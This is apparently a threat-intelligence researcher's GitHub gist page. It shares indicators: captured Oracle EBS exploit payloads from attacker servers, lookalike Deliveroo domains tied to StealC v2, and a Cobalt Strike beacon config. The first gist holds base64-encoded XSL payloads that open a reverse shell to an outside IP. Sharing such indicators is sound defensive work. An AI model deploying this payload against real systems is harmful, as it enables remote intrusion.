Skip to content

Instantly share code, notes, and snippets.

@drb-ra
drb-ra / ORACLE_EBS_NDAY_EXPLOIT_POC_C2.txt
Last active October 9, 2025 08:51
ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD-CL0P_HUNTERS Public Servers (2025-10-09 @ 10:00 AM UTC)
Payload Delivery :
156.67.24.43:8080 : <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'CiAgICB2YXIgc3RyaW5nYyA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCdqYXZhLmxhbmcuU3RyaW5nJyk7CiAgICB2YXIgY21kcyA9ICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShzdHJpbmdjLDMpOwogICAgamF2YS5sYW5nLnJlZmxlY3QuQXJyYXkuc2V0KGNtZHMsMCwnc2gnKTsKICAgIGphdmEubGFuZy5yZWZsZWN0LkFycmF5LnNldChjbWRzLDEsJy1jJyk7CiAgICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5zZXQoY21kcywyLCdiYXNoIC1pID4mIC9kZXYvdGNwLzE1Ni42Ny4yNC40My80NDQ0IDA+JjEnKTsKICAgIGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZHMpOwogICAgMQogICAgICAgIA==')"/>
159.223.153.251:80 : <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'CiAgICB2YXIgc3RyaW5nYyA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCdqYXZhLmxhbmcuU3RyaW5nJyk7CiAgICB2YXIgY21kcyA9ICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShzdHJpbmdjLDMpOwogICAgamF2YS5sYW5nLnJlZmxlY3QuQXJyYXkuc2V0KGNtZHMsMCwnc2gnKTsKICAgIGphdmEubGFuZy5yZWZsZWN0LkFycmF5LnNldChjbWRzLDEsJy1jJyk7CiAgICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5zZXQoY21kcywyL
@drb-ra
drb-ra / stealcv2-domains-cloudflare.txt
Created April 12, 2025 10:17
Possible StealC v2 Cloudflare Hosted Domains
deeliveroo-ae.com
deeliverooo-ae.com
deeljverooo-ae.com
deljveero-ae.com
deljvero-ae.com
deljveroo-ae.com
deljveroo-uae.com
deljverooo-ae.com
deljverooo-uae.com
deljveroooo-ae.com
@drb-ra
drb-ra / 47.238.103.180:8080.json
Created October 31, 2024 10:55
Cobalt Strike Config for alisecurity[.]xyz
{
"BeaconType": [
"HTTP"
],
"Port": 8080,
"SleepTime": 5000,
"MaxGetSize": 1048576,
"Jitter": 0,
"MaxDNS": "Not Found",
"PublicKey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCYDFlT5BNd6j1RnqDawFFfC0Lff8SdGJAbY6XWqN0oUnXtnHYKRLOm/xG/fWtVX9pWOiUFI8SSS1+cZhyHTJoFLtD20UhJO6KG0GX07J53j4Wc93SMwKR3G4myzjkJXzQB+vJ2JVM4QuB5V/5YvHx3gd+4UiuNenUmznmLvdZFwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",